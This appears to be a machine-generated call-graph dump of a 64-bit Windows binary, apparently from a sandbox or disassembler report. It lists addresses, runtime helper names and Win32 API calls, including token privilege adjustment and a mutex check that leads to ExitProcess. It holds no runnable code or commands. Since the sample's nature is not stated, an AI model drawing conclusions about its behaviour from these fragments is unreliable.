7ff6f1df9f1c std::_Facet_Register 2 API calls 64576->64577 64577->64576 64579 7ff6f1ded3cd RtlFreeHeap 64578->64579 64580 7ff6f1ded3fe 64578->64580 64579->64580 64581 7ff6f1ded3e8 GetLastError 64579->64581 64580->64565 64582 7ff6f1ded3f5 __free_lconv_num 64581->64582 64587 7ff6f1de4e68 11 API calls memcpy_s 64582->64587 64584->64564 64586->64574 64587->64580 64588->64568 64590 7ff6f1d9900f 64589->64590 64595 7ff6f1d98eaf 64589->64595 64604 7ff6f1d7b8e0 82 API calls 64590->64604 64592 7ff6f1d98f19 64596 7ff6f1dfe888 std::_Facet_Register 82 API calls 64592->64596 64593 7ff6f1d99014 64605 7ff6f1d7b820 82 API calls 2 library calls 64593->64605 64594 7ff6f1d98eff memcpy_s 64601 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64594->64601 64603 7ff6f1d98fbe memcpy_s _Receive_impl 64594->64603 64595->64592 64595->64594 64598 7ff6f1d98f48 64595->64598 64599 7ff6f1d98f0c 64595->64599 64596->64594 64600 7ff6f1dfe888 std::_Facet_Register 82 API calls 64598->64600 64599->64592 64599->64593 64600->64594 64602 7ff6f1d99020 64601->64602 64603->64534 64605->64594 64607 7ff6f1dc09e5 64606->64607 64610 7ff6f1dc0950 memcpy_s 64606->64610 64611 7ff6f1dc45c0 83 API calls 5 library calls 64607->64611 64609 7ff6f1dc09fa 64609->64410 64610->64410 64611->64609 64613 7ff6f1d7eaf0 97 API calls 64612->64613 64620 7ff6f1dcf06f memcpy_s 64613->64620 64614 7ff6f1dcf0a7 64615 7ff6f1dcf0af 64614->64615 64669 7ff6f1dcf7bf 64614->64669 64618 7ff6f1dfe860 _Strcoll 8 API calls 64615->64618 64617 7ff6f1dcf7d6 64621 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64617->64621 64619 7ff6f1dcf751 64618->64619 64619->64414 64670 7ff6f1d95310 64619->64670 64620->64614 64620->64615 64675 7ff6f1d9a910 64620->64675 64629 7ff6f1dcf7dc 64621->64629 64623 7ff6f1dcf0ee 64624 7ff6f1dcf545 64623->64624 64625 7ff6f1dcf151 64623->64625 64692 7ff6f1dafdb0 64624->64692 64757 7ff6f1dd9b70 30 API calls 2 library calls 64625->64757 64765 7ff6f1d7cdc0 82 API calls 64629->64765 64631 7ff6f1dcf163 64758 7ff6f1dd9d30 98 API calls 5 library calls 64631->64758 64635 7ff6f1dcf800 64639 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 64635->64639 64637 7ff6f1dcf597 64641 7ff6f1dafdb0 84 API calls 64637->64641 64638 7ff6f1dcf174 64642 7ff6f1dcf25c GetFileSize 64638->64642 64643 7ff6f1dcf187 64638->64643 64644 7ff6f1dcf811 64639->64644 64645 7ff6f1dcf5aa 64641->64645 64647 7ff6f1dcf29d 64642->64647 64649 7ff6f1dcf278 memcpy_s 64642->64649 64643->64617 64646 7ff6f1dcf1ce _Receive_impl 64643->64646 64737 7ff6f1ddd640 64645->64737 64759 7ff6f1d912f0 82 API calls 64646->64759 64647->64649 64652 7ff6f1d98e80 82 API calls 64647->64652 64648 7ff6f1dcf302 SetFilePointer ReadFile 64659 7ff6f1dcf462 64648->64659 64661 7ff6f1dcf351 64648->64661 64649->64648 64652->64648 64654 7ff6f1dcf21f 64654->64615 64656 7ff6f1dcf4b7 _Receive_impl 64761 7ff6f1d912f0 82 API calls 64656->64761 64657 7ff6f1dcf3d4 _Receive_impl 64760 7ff6f1d912f0 82 API calls 64657->64760 64659->64617 64659->64656 64661->64617 64661->64657 64662 7ff6f1dcf66d 64762 7ff6f1d912f0 82 API calls 64662->64762 64665 7ff6f1dcf76c 64763 7ff6f1d7cdc0 82 API calls 64665->64763 64667 7ff6f1dcf7ae 64668 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 64667->64668 64668->64669 64764 7ff6f1d7e240 87 API calls Concurrency::cancel_current_task 64669->64764 64671 7ff6f1d927e0 82 API calls 64670->64671 64672 7ff6f1d9537a 64671->64672 64673 7ff6f1d927e0 82 API calls 64672->64673 64674 7ff6f1d9548d 64673->64674 64674->64414 64766 7ff6f1d94ab0 64675->64766 64682 7ff6f1d9aa1f 64792 7ff6f1d93520 78 API calls _Strcoll 64682->64792 64683 7ff6f1d9aaa8 64691 7ff6f1d9aa58 64683->64691 64794 7ff6f1d7cdc0 82 API calls 64683->64794 64685 7ff6f1d9aa31 64793 7ff6f1d978a0 115 API calls 4 library calls 64685->64793 64687 7ff6f1d9ab12 64689 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 64687->64689 64690 7ff6f1d9ab23 64689->64690 64691->64623 64693 7ff6f1dafe0d 64692->64693 64695 7ff6f1dafef3 64692->64695 65018 7ff6f1db0bd0 64693->65018 65077 7ff6f1d7cdc0 82 API calls 64695->65077 64696 7ff6f1dafe32 64701 7ff6f1dafe69 64696->64701 65067 7ff6f1d908a0 64696->65067 64698 7ff6f1dafec0 64707 7ff6f1dafcd0 64698->64707 64699 7ff6f1daff35 64700 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 64699->64700 64700->64701 64701->64698 65078 7ff6f1d7cdc0 82 API calls 64701->65078 64703 7ff6f1daff8e 64704 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 64703->64704 64705 7ff6f1daffa2 64704->64705 64708 7ff6f1dafd00 64707->64708 64709 7ff6f1db0bd0 82 API calls 64708->64709 64710 7ff6f1dafd0f 64709->64710 64710->64637 64711 7ff6f1d98560 64710->64711 64712 7ff6f1d9869a 64711->64712 64717 7ff6f1d98589 64711->64717 65189 7ff6f1d7b8e0 82 API calls 64712->65189 64714 7ff6f1d985ee 64716 7ff6f1dfe888 std::_Facet_Register 82 API calls 64714->64716 64715 7ff6f1d9869f 65190 7ff6f1d7b820 82 API calls 2 library calls 64715->65190 64724 7ff6f1d985d4 memcpy_s 64716->64724 64717->64714 64719 7ff6f1d985e1 64717->64719 64720 7ff6f1d9861d 64717->64720 64717->64724 64719->64714 64719->64715 64721 7ff6f1dfe888 std::_Facet_Register 82 API calls 64720->64721 64721->64724 64722 7ff6f1d98667 memcpy_s _Receive_impl 64722->64637 64723 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64725 7ff6f1d986ab 64723->64725 64724->64722 64724->64723 64726 7ff6f1d9870c 64725->64726 64728 7ff6f1d98765 64725->64728 64729 7ff6f1d9875a 64725->64729 64733 7ff6f1d986dc memcpy_s 64725->64733 64727 7ff6f1dfe888 std::_Facet_Register 82 API calls 64726->64727 64730 7ff6f1d98722 64727->64730 64732 7ff6f1dfe888 std::_Facet_Register 82 API calls 64728->64732 64729->64726 64731 7ff6f1d9879f 64729->64731 64730->64733 64735 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64730->64735 65191 7ff6f1d7b820 82 API calls 2 library calls 64731->65191 64732->64733 64733->64637 64736 7ff6f1d987aa 64735->64736 64736->64637 64738 7ff6f1ddd69d 64737->64738 64741 7ff6f1ddd6b7 64737->64741 64738->64741 64750 7ff6f1d90ca0 82 API calls 64738->64750 64739 7ff6f1ddd75a 64744 7ff6f1ddd765 64739->64744 65205 7ff6f1d94600 82 API calls 5 library calls 64739->65205 64741->64739 65192 7ff6f1ddf150 64741->65192 64743 7ff6f1ddd7ea _Receive_impl 64745 7ff6f1dfe860 _Strcoll 8 API calls 64743->64745 64744->64743 64746 7ff6f1ddd829 64744->64746 64747 7ff6f1dcf60d 64745->64747 64748 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 64746->64748 64747->64629 64751 7ff6f1d93620 64747->64751 64749 7ff6f1ddd82e 64748->64749 64750->64741 64752 7ff6f1d9363a 64751->64752 64753 7ff6f1d9368a 64751->64753 64754 7ff6f1d93430 79 API calls 64752->64754 64753->64662 64753->64665 64755 7ff6f1d93674 64754->64755 64756 7ff6f1de3818 81 API calls 64755->64756 64756->64753 64757->64631 64758->64638 64759->64654 64760->64654 64761->64654 64762->64615 64763->64667 64765->64635 64767 7ff6f1dfe888 std::_Facet_Register 82 API calls 64766->64767 64768 7ff6f1d94b11 64767->64768 64795 7ff6f1e0c5ec 64768->64795 64770 7ff6f1d94b21 64804 7ff6f1d94e10 64770->64804 64773 7ff6f1d94bae 64774 7ff6f1d94bbb 64773->64774 64819 7ff6f1e0c8b8 6 API calls std::_Lockit::_Lockit 64773->64819 64781 7ff6f1d9c3b0 64774->64781 64776 7ff6f1d94bd6 64820 7ff6f1d7cdc0 82 API calls 64776->64820 64778 7ff6f1d94c16 64779 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 64778->64779 64780 7ff6f1d94c27 64779->64780 64832 7ff6f1d94500 64781->64832 64784 7ff6f1e0cb28 64785 7ff6f1e0cb6e 64784->64785 64791 7ff6f1d9aa16 64785->64791 64837 7ff6f1e0e200 64785->64837 64789 7ff6f1e0cbbc 64789->64791 64857 7ff6f1de3818 64789->64857 64791->64682 64791->64683 64792->64685 64793->64691 64794->64687 64821 7ff6f1e0bf8c 64795->64821 64797 7ff6f1e0c60e 64803 7ff6f1e0c652 memcpy_s 64797->64803 64825 7ff6f1e0c7e4 82 API calls std::_Facet_Register 64797->64825 64799 7ff6f1e0c626 64826 7ff6f1e0c814 79 API calls std::locale::_Setgloballocale 64799->64826 64801 7ff6f1e0c631 64801->64803 64827 7ff6f1de7620 13 API calls 2 library calls 64801->64827 64803->64770 64805 7ff6f1e0bf8c std::_Lockit::_Lockit 6 API calls 64804->64805 64806 7ff6f1d94e40 64805->64806 64807 7ff6f1e0bf8c std::_Lockit::_Lockit 6 API calls 64806->64807 64809 7ff6f1d94e65 64806->64809 64807->64809 64808 7ff6f1d94edd 64810 7ff6f1dfe860 _Strcoll 8 API calls 64808->64810 64809->64808 64829 7ff6f1d7ca60 121 API calls 5 library calls 64809->64829 64811 7ff6f1d94b52 64810->64811 64811->64773 64811->64776 64813 7ff6f1d94eef 64814 7ff6f1d94ef5 64813->64814 64815 7ff6f1d94f56 64813->64815 64830 7ff6f1e0c5ac 82 API calls std::_Facet_Register 64814->64830 64831 7ff6f1d7c5a0 82 API calls 2 library calls 64815->64831 64818 7ff6f1d94f5b 64819->64774 64820->64778 64822 7ff6f1e0bf9b 64821->64822 64824 7ff6f1e0bfa0 64821->64824 64828 7ff6f1dec42c 6 API calls std::_Lockit::_Lockit 64822->64828 64824->64797 64825->64799 64826->64801 64827->64803 64829->64813 64830->64808 64831->64818 64833 7ff6f1dfe888 std::_Facet_Register 82 API calls 64832->64833 64834 7ff6f1d94577 64833->64834 64835 7ff6f1e0c5ec 89 API calls 64834->64835 64836 7ff6f1d94587 64835->64836 64836->64683 64836->64784 64838 7ff6f1e0e12c 64837->64838 64839 7ff6f1e0e152 64838->64839 64842 7ff6f1e0e185 64838->64842 64877 7ff6f1de4e68 11 API calls memcpy_s 64839->64877 64841 7ff6f1e0e157 64878 7ff6f1de8234 78 API calls _invalid_parameter_noinfo 64841->64878 64843 7ff6f1e0e198 64842->64843 64844 7ff6f1e0e18b 64842->64844 64865 7ff6f1ded6a8 64843->64865 64879 7ff6f1de4e68 11 API calls memcpy_s 64844->64879 64848 7ff6f1e0cba1 64848->64791 64856 7ff6f1de7e14 78 API calls _invalid_parameter_noinfo 64848->64856 64856->64789 64858 7ff6f1de3848 64857->64858 65004 7ff6f1de36f4 64858->65004 64860 7ff6f1de3861 64861 7ff6f1de3886 64860->64861 65014 7ff6f1ddf864 78 API calls 2 library calls 64860->65014 64863 7ff6f1de389b 64861->64863 65015 7ff6f1ddf864 78 API calls 2 library calls 64861->65015 64863->64791 64882 7ff6f1dec3bc EnterCriticalSection 64865->64882 64877->64841 64878->64848 64879->64848 65005 7ff6f1de370f 65004->65005 65006 7ff6f1de373d 65004->65006 65017 7ff6f1de8168 78 API calls 2 library calls 65005->65017 65008 7ff6f1de372f 65006->65008 65016 7ff6f1de4934 EnterCriticalSection 65006->65016 65008->64860 65014->64861 65015->64863 65017->65008 65019 7ff6f1db0c10 65018->65019 65023 7ff6f1db0bed 65018->65023 65021 7ff6f1db0c1e 65019->65021 65079 7ff6f1d9af10 65019->65079 65020 7ff6f1db0c0a 65020->64696 65021->64696 65023->65020 65103 7ff6f1d7cdc0 82 API calls 65023->65103 65025 7ff6f1db0c73 65026 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65025->65026 65035 7ff6f1db0c84 _Receive_impl 65026->65035 65027 7ff6f1db0de5 65027->64696 65028 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65029 7ff6f1db0f37 65028->65029 65104 7ff6f1daf640 82 API calls memcpy_s 65029->65104 65031 7ff6f1db0fcc 65106 7ff6f1daf640 82 API calls memcpy_s 65031->65106 65034 7ff6f1db0f99 65034->65031 65037 7ff6f1db1152 65034->65037 65105 7ff6f1da4dd0 82 API calls _Strcoll 65034->65105 65035->65027 65035->65028 65035->65035 65036 7ff6f1db0fef 65107 7ff6f1da4dd0 82 API calls _Strcoll 65036->65107 65039 7ff6f1db117d 65037->65039 65111 7ff6f1daf4d0 82 API calls 3 library calls 65037->65111 65046 7ff6f1db11a6 65039->65046 65112 7ff6f1daf050 82 API calls 3 library calls 65039->65112 65042 7ff6f1db1006 65048 7ff6f1db103d 65042->65048 65061 7ff6f1db11ae _Receive_impl 65042->65061 65064 7ff6f1db1069 65042->65064 65108 7ff6f1daf4d0 82 API calls 3 library calls 65042->65108 65043 7ff6f1db11b3 65051 7ff6f1db11eb 65043->65051 65113 7ff6f1daf4d0 82 API calls 3 library calls 65043->65113 65053 7ff6f1db12ea 65046->65053 65054 7ff6f1db12a1 _Receive_impl 65046->65054 65047 7ff6f1db12bf 65055 7ff6f1dfe860 _Strcoll 8 API calls 65047->65055 65048->65064 65109 7ff6f1daf050 82 API calls 3 library calls 65048->65109 65051->65061 65114 7ff6f1daf050 82 API calls 3 library calls 65051->65114 65057 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65053->65057 65116 7ff6f1d99610 78 API calls 2 library calls 65054->65116 65059 7ff6f1db12cf 65055->65059 65056 7ff6f1db12ef 65060 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65056->65060 65057->65056 65059->64696 65063 7ff6f1db12f5 65060->65063 65061->65056 65115 7ff6f1d99610 78 API calls 2 library calls 65061->65115 65062 7ff6f1da4dd0 82 API calls 65062->65064 65064->65043 65064->65061 65064->65062 65065 7ff6f1daf4d0 82 API calls 65064->65065 65110 7ff6f1daf050 82 API calls 3 library calls 65064->65110 65065->65064 65068 7ff6f1d908d3 65067->65068 65076 7ff6f1d9092b 65068->65076 65122 7ff6f1d93430 65068->65122 65070 7ff6f1dfe860 _Strcoll 8 API calls 65072 7ff6f1d90999 65070->65072 65071 7ff6f1d908f6 65073 7ff6f1d90916 65071->65073 65071->65076 65132 7ff6f1de7d7c 65071->65132 65072->64701 65073->65076 65140 7ff6f1de7374 65073->65140 65076->65070 65077->64699 65078->64703 65080 7ff6f1d9af4e 65079->65080 65081 7ff6f1d9afd0 65079->65081 65117 7ff6f1d99f00 82 API calls 65080->65117 65083 7ff6f1dfe860 _Strcoll 8 API calls 65081->65083 65085 7ff6f1d9affd 65083->65085 65084 7ff6f1d9af5b 65086 7ff6f1d9afbd 65084->65086 65088 7ff6f1d9b012 65084->65088 65085->65021 65086->65081 65118 7ff6f1d9c530 82 API calls 2 library calls 65086->65118 65119 7ff6f1d7cdc0 82 API calls 65088->65119 65090 7ff6f1d9b054 65091 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65090->65091 65092 7ff6f1d9b065 65091->65092 65093 7ff6f1d9af10 82 API calls 65092->65093 65094 7ff6f1d9b0bb 65092->65094 65093->65094 65095 7ff6f1d9b18a 65094->65095 65097 7ff6f1d9b1c8 65094->65097 65096 7ff6f1d9b19b 65095->65096 65120 7ff6f1d9c530 82 API calls 2 library calls 65095->65120 65096->65021 65121 7ff6f1d7cdc0 82 API calls 65097->65121 65100 7ff6f1d9b20a 65101 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65100->65101 65102 7ff6f1d9b21b 65101->65102 65103->65025 65104->65034 65105->65034 65106->65036 65107->65042 65108->65048 65109->65064 65110->65064 65111->65039 65112->65046 65113->65051 65114->65061 65115->65046 65116->65047 65117->65084 65118->65081 65119->65090 65120->65096 65121->65100 65123 7ff6f1d93502 65122->65123 65124 7ff6f1d93453 65122->65124 65125 7ff6f1dfe860 _Strcoll 8 API calls 65123->65125 65124->65123 65128 7ff6f1d9345d 65124->65128 65126 7ff6f1d93511 65125->65126 65126->65071 65127 7ff6f1dfe860 _Strcoll 8 API calls 65129 7ff6f1d934be 65127->65129 65130 7ff6f1d934a1 65128->65130 65149 7ff6f1de4cf0 79 API calls _invalid_parameter_noinfo 65128->65149 65129->65071 65130->65127 65133 7ff6f1de7dac 65132->65133 65150 7ff6f1de7b0c 65133->65150 65136 7ff6f1de7dea 65137 7ff6f1de7dff 65136->65137 65162 7ff6f1ddf864 78 API calls 2 library calls 65136->65162 65137->65073 65141 7ff6f1de739d 65140->65141 65142 7ff6f1de7388 65140->65142 65141->65142 65144 7ff6f1de73a2 65141->65144 65173 7ff6f1de4e68 11 API calls memcpy_s 65142->65173 65165 7ff6f1df0274 65144->65165 65145 7ff6f1de738d 65174 7ff6f1de8234 78 API calls _invalid_parameter_noinfo 65145->65174 65148 7ff6f1de7398 65148->65076 65149->65130 65151 7ff6f1de7b76 65150->65151 65152 7ff6f1de7b36 65150->65152 65151->65152 65153 7ff6f1de7b82 65151->65153 65164 7ff6f1de8168 78 API calls 2 library calls 65152->65164 65163 7ff6f1de4934 EnterCriticalSection 65153->65163 65156 7ff6f1de7b5d 65156->65136 65161 7ff6f1ddf864 78 API calls 2 library calls 65156->65161 65161->65136 65162->65137 65164->65156 65166 7ff6f1df02a4 65165->65166 65175 7ff6f1defd80 65166->65175 65169 7ff6f1df02e3 65171 7ff6f1df02f8 65169->65171 65186 7ff6f1ddf864 78 API calls 2 library calls 65169->65186 65171->65148 65173->65145 65174->65148 65176 7ff6f1defdca 65175->65176 65177 7ff6f1defd9b 65175->65177 65187 7ff6f1de4934 EnterCriticalSection 65176->65187 65188 7ff6f1de8168 78 API calls 2 library calls 65177->65188 65180 7ff6f1defdbb 65180->65169 65185 7ff6f1ddf864 78 API calls 2 library calls 65180->65185 65185->65169 65186->65171 65188->65180 65190->64724 65191->64730 65206 7ff6f1ddf080 65192->65206 65194 7ff6f1ddf362 65194->64739 65195 7ff6f1ddf399 65210 7ff6f1d7b8e0 82 API calls 65195->65210 65197 7ff6f1ddf39f 65211 7ff6f1d7b820 82 API calls 2 library calls 65197->65211 65199 7ff6f1ddf080 82 API calls 65200 7ff6f1ddf18c memcpy_s _Receive_impl 65199->65200 65200->65194 65200->65195 65200->65197 65200->65199 65202 7ff6f1ddf394 65200->65202 65203 7ff6f1dfe888 82 API calls std::_Facet_Register 65200->65203 65201 7ff6f1ddf3a5 65204 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65202->65204 65203->65200 65204->65195 65205->64744 65207 7ff6f1ddf0b3 65206->65207 65208 7ff6f1ddf096 65206->65208 65207->65200 65208->65207 65209 7ff6f1d90ca0 82 API calls 65208->65209 65209->65207 65211->65201 65213 7ff6f1d93dd2 65212->65213 65216 7ff6f1d93d93 memcpy_s 65212->65216 65217 7ff6f1d99030 65213->65217 65215 7ff6f1d93deb 65215->64430 65216->64430 65218 7ff6f1d991a6 65217->65218 65219 7ff6f1d99068 65217->65219 65232 7ff6f1d7b8e0 82 API calls 65218->65232 65224 7ff6f1d990c0 65219->65224 65225 7ff6f1d990fc 65219->65225 65226 7ff6f1d990cd 65219->65226 65230 7ff6f1d990b3 memcpy_s 65219->65230 65221 7ff6f1dfe888 std::_Facet_Register 82 API calls 65221->65230 65222 7ff6f1d991ab 65233 7ff6f1d7b820 82 API calls 2 library calls 65222->65233 65224->65222 65224->65226 65227 7ff6f1dfe888 std::_Facet_Register 82 API calls 65225->65227 65226->65221 65227->65230 65228 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65229 7ff6f1d991b7 65228->65229 65230->65228 65231 7ff6f1d9915c memcpy_s _Receive_impl 65230->65231 65231->65215 65233->65230 65235 7ff6f1d7ec2b 65234->65235 65236 7ff6f1d7ed21 65235->65236 65237 7ff6f1d98560 82 API calls 65235->65237 65238 7ff6f1d93d70 82 API calls 65236->65238 65237->65236 65239 7ff6f1d7ed3a 65238->65239 65240 7ff6f1d93d70 82 API calls 65239->65240 65241 7ff6f1d7ed53 65240->65241 65242 7ff6f1d7ed60 65241->65242 65274 7ff6f1d98d10 82 API calls 5 library calls 65241->65274 65244 7ff6f1d93d70 82 API calls 65242->65244 65245 7ff6f1d7edaa 65244->65245 65246 7ff6f1d93d70 82 API calls 65245->65246 65247 7ff6f1d7edbf 65246->65247 65248 7ff6f1d7ee03 _Receive_impl 65247->65248 65250 7ff6f1d7ee3c 65247->65250 65249 7ff6f1dfe860 _Strcoll 8 API calls 65248->65249 65251 7ff6f1d7ee28 65249->65251 65252 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65250->65252 65251->64436 65253 7ff6f1d7ee41 65252->65253 65275 7ff6f1e007d0 65253->65275 65255 7ff6f1d7ee85 65256 7ff6f1e007d0 __std_exception_destroy 13 API calls 65255->65256 65257 7ff6f1d7ee92 _Receive_impl 65256->65257 65257->64436 65259 7ff6f1da0464 65258->65259 65260 7ff6f1da0458 65258->65260 65262 7ff6f1d93d70 82 API calls 65259->65262 65261 7ff6f1d98560 82 API calls 65260->65261 65261->65259 65263 7ff6f1da0481 65262->65263 65264 7ff6f1d93d70 82 API calls 65263->65264 65265 7ff6f1da049a 65264->65265 65266 7ff6f1d93d70 82 API calls 65265->65266 65267 7ff6f1da04b3 65266->65267 65267->64438 65269 7ff6f1d97ca4 65268->65269 65270 7ff6f1e00761 65268->65270 65269->64444 65269->64449 65270->65269 65271 7ff6f1e00796 65270->65271 65280 7ff6f1de8cb0 78 API calls 2 library calls 65270->65280 65281 7ff6f1de7620 13 API calls 2 library calls 65271->65281 65274->65242 65276 7ff6f1e007df 65275->65276 65277 7ff6f1e007e7 65275->65277 65279 7ff6f1de7620 13 API calls 2 library calls 65276->65279 65277->65255 65279->65277 65280->65271 65281->65269 65282->64456 65283 7ff6f1dcc600 65358 7ff6f1dcf820 GetCurrentProcess OpenProcessToken 65283->65358 65286 7ff6f1dcc624 65401 7ff6f1dcfb60 83 API calls 2 library calls 65286->65401 65287 7ff6f1dcc64e 65365 7ff6f1ddb9b0 GetCurrentProcess OpenProcessToken 65287->65365 65291 7ff6f1dcc62e 65402 7ff6f1dda780 110 API calls _Strcoll 65291->65402 65292 7ff6f1ddb9b0 13 API calls 65297 7ff6f1dcc666 65292->65297 65294 7ff6f1dcc637 65403 7ff6f1d92660 78 API calls 2 library calls 65294->65403 65296 7ff6f1dcc642 ExitProcess 65373 7ff6f1dcd030 65297->65373 65300 7ff6f1dcc734 OpenMutexA 65301 7ff6f1dcc76d ExitProcess 65300->65301 65302 7ff6f1dcc779 CreateMutexExA 65300->65302 65377 7ff6f1dc66f0 65302->65377 65303 7ff6f1dcc72f _Receive_impl 65303->65300 65305 7ff6f1dcc8c6 65307 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65305->65307 65309 7ff6f1dcc8cb 65307->65309 65311 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65309->65311 65314 7ff6f1dcc8d1 65311->65314 65359 7ff6f1dcf8b4 65358->65359 65360 7ff6f1dcf878 GetTokenInformation 65358->65360 65361 7ff6f1dcf8c1 CloseHandle 65359->65361 65362 7ff6f1dcf8cd 65359->65362 65360->65359 65361->65362 65363 7ff6f1dfe860 _Strcoll 8 API calls 65362->65363 65364 7ff6f1dcc620 65363->65364 65364->65286 65364->65287 65366 7ff6f1ddba1b LookupPrivilegeValueW 65365->65366 65367 7ff6f1ddba86 65365->65367 65366->65367 65368 7ff6f1ddba3c AdjustTokenPrivileges 65366->65368 65369 7ff6f1ddba8e CloseHandle 65367->65369 65370 7ff6f1ddba9a 65367->65370 65368->65367 65369->65370 65371 7ff6f1dfe860 _Strcoll 8 API calls 65370->65371 65372 7ff6f1dcc65a 65371->65372 65372->65292 65374 7ff6f1dcd052 65373->65374 65374->65374 65375 7ff6f1dc0920 83 API calls 65374->65375 65376 7ff6f1dcc6f6 65375->65376 65376->65300 65376->65303 65376->65305 65378 7ff6f1dc6721 65377->65378 65404 7ff6f1dc75e0 82 API calls 2 library calls 65378->65404 65380 7ff6f1dc6e3c 65405 7ff6f1d94600 82 API calls 5 library calls 65380->65405 65382 7ff6f1dc6e7f 65406 7ff6f1dc0040 65382->65406 65384 7ff6f1dc6eb7 65415 7ff6f1d91900 65384->65415 65390 7ff6f1dc6f51 65398 7ff6f1dc6f7c _Receive_impl 65390->65398 65445 7ff6f1d98830 78 API calls 2 library calls 65390->65445 65392 7ff6f1dc7015 65453 7ff6f1d92880 65392->65453 65395 7ff6f1dc7023 65396 7ff6f1d92880 78 API calls 65395->65396 65397 7ff6f1dc702e 65396->65397 65399 7ff6f1d91900 82 API calls 65397->65399 65446 7ff6f1d91600 65398->65446 65400 7ff6f1dc7089 65399->65400 65401->65291 65402->65294 65403->65296 65404->65380 65405->65382 65458 7ff6f1d937f0 65406->65458 65414 7ff6f1dc010f 65414->65384 65416 7ff6f1d9193f 65415->65416 65417 7ff6f1d91937 65415->65417 65419 7ff6f1d919d9 65416->65419 65831 7ff6f1d97d40 65416->65831 65841 7ff6f1d97e80 82 API calls 2 library calls 65417->65841 65842 7ff6f1d97f10 82 API calls 65419->65842 65421 7ff6f1d9195d 65422 7ff6f1d91990 _Receive_impl 65421->65422 65427 7ff6f1d919d4 65421->65427 65424 7ff6f1dfe860 _Strcoll 8 API calls 65422->65424 65428 7ff6f1d919bf 65424->65428 65425 7ff6f1d919f6 65426 7ff6f1d97ac0 82 API calls 65425->65426 65429 7ff6f1d91a09 65426->65429 65430 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65427->65430 65433 7ff6f1d957c0 65428->65433 65431 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65429->65431 65430->65419 65432 7ff6f1d91a1a 65431->65432 65435 7ff6f1d9583e 65433->65435 65436 7ff6f1d957fd 65433->65436 65434 7ff6f1d9581c 65444 7ff6f1d95ad0 82 API calls 3 library calls 65434->65444 65438 7ff6f1d979f0 82 API calls 65435->65438 65436->65434 65844 7ff6f1d94600 82 API calls 5 library calls 65436->65844 65439 7ff6f1d9585e 65438->65439 65440 7ff6f1d97ac0 82 API calls 65439->65440 65441 7ff6f1d95871 65440->65441 65442 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65441->65442 65443 7ff6f1d95882 65442->65443 65444->65390 65445->65398 65447 7ff6f1d91611 65446->65447 65448 7ff6f1d91646 _Receive_impl 65446->65448 65845 7ff6f1d98830 78 API calls 2 library calls 65447->65845 65448->65392 65450 7ff6f1d9161a 65450->65448 65451 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65450->65451 65452 7ff6f1d91666 65451->65452 65454 7ff6f1d92893 65453->65454 65455 7ff6f1d928b7 _Receive_impl 65453->65455 65454->65455 65456 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65454->65456 65455->65395 65457 7ff6f1d928dd 65456->65457 65459 7ff6f1d93823 65458->65459 65460 7ff6f1d93946 65458->65460 65461 7ff6f1dfe860 _Strcoll 8 API calls 65459->65461 65460->65459 65463 7ff6f1d93953 65460->65463 65462 7ff6f1d93852 65461->65462 65468 7ff6f1dc24b0 65462->65468 65557 7ff6f1d988c0 82 API calls 4 library calls 65463->65557 65465 7ff6f1d93974 65466 7ff6f1e00e88 Concurrency::cancel_current_task 2 API calls 65465->65466 65467 7ff6f1d93985 65466->65467 65469 7ff6f1dc24f4 65468->65469 65558 7ff6f1de494c 65469->65558 65473 7ff6f1dc00f5 65474 7ff6f1dc02c0 65473->65474 65475 7ff6f1dc05d1 65474->65475 65478 7ff6f1dc030b memcpy_s 65474->65478 65775 7ff6f1dc3710 84 API calls 2 library calls 65475->65775 65477 7ff6f1dc0604 65479 7ff6f1dc0a10 82 API calls 65477->65479 65587 7ff6f1d9b5b0 82 API calls 65478->65587 65484 7ff6f1dc0610 65479->65484 65481 7ff6f1dc035b 65588 7ff6f1dc2840 84 API calls 2 library calls 65481->65588 65483 7ff6f1dc0806 65489 7ff6f1dc05cc _Receive_impl 65483->65489 65547 7ff6f1dc08b5 65483->65547 65487 7ff6f1d9b780 84 API calls 65484->65487 65534 7ff6f1dc0797 _Receive_impl 65484->65534 65485 7ff6f1dc036b 65490 7ff6f1dc0a10 82 API calls 65485->65490 65486 7ff6f1d937f0 82 API calls 65491 7ff6f1dc07cc 65486->65491 65493 7ff6f1dc065d 65487->65493 65488 7ff6f1dfe860 _Strcoll 8 API calls 65494 7ff6f1dc0101 65488->65494 65489->65488 65495 7ff6f1dc0377 65490->65495 65492 7ff6f1d93ff0 82 API calls 65491->65492 65492->65483 65497 7ff6f1da1af0 84 API calls 65493->65497 65550 7ff6f1dc0200 65494->65550 65549 7ff6f1dc0504 _Receive_impl 65495->65549 65589 7ff6f1d9b780 65495->65589 65496 7ff6f1de8254 _invalid_parameter_noinfo_noreturn 78 API calls 65498 7ff6f1dc08bb 65496->65498 65499 7ff6f1dc0683 65497->65499 65776 7ff6f1d93e90 80 API calls 65498->65776 65503 7ff6f1d9bd00 84 API calls 65499->65503 65500 7ff6f1dc0565 65502 7ff6f1dc05bf 65500->65502 65506 